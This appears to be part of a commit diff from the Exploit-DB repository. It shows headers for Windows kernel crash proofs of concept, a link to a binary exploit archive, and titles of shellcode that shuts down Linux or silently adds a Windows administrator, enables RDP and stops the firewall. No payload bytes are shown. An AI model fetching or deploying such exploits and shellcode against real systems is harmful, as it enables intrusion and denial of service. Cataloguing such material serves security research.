---
Proof of Concept:

2
exploits/windows_x86/dos/38278.txt
View file

@ -1,7 +1,7 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=457
---
The attached testcase crashes Win 7 with Special Pool enabled while accessing the freed global cursor object (_gpqCursor). See poc.cpp for instructions on how to compile and run.
The attached testcase crashes Win 7 with Special Pool enabled while accessing the freed global cursor object (_gpqCursor). See poc.cpp for instructions on how to compile and run.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38278.zip

2
exploits/windows_x86/dos/38307.txt
View file

@ -1,7 +1,7 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=474
---
The attached PoC triggers a buffer overflow in the NtGdiBitBlt system call. It reproduces reliable on Win 7 32-bit with Special Pool enabled on win32k.sys
The attached PoC triggers a buffer overflow in the NtGdiBitBlt system call. It reproduces reliable on Win 7 32-bit with Special Pool enabled on win32k.sys
---
Proof of Concept:

2
shellcodes/linux_x86/37289.txt
View file

@ -1,4 +1,4 @@
Linux/x86 - Shutdown(init 0) - 30 bytes
Linux/x86 - Shutdown(init 0) - 30 bytes
#Greetz : Bomberman(Leader)
#Author : B3mB4m

2
shellcodes/windows_x86-64/35794.txt
View file

@ -1,5 +1,5 @@
#Author: Ali Razmjoo
#Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
#Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
Obfuscated Shellcode Windows x64 [1218 Bytes].c

2
shellcodes/windows_x86/35793.txt
View file

@ -1,5 +1,5 @@
#Author: Ali Razmjoo
#Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
#Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
Obfuscated Shellcode Windows x86 [1218 Bytes].c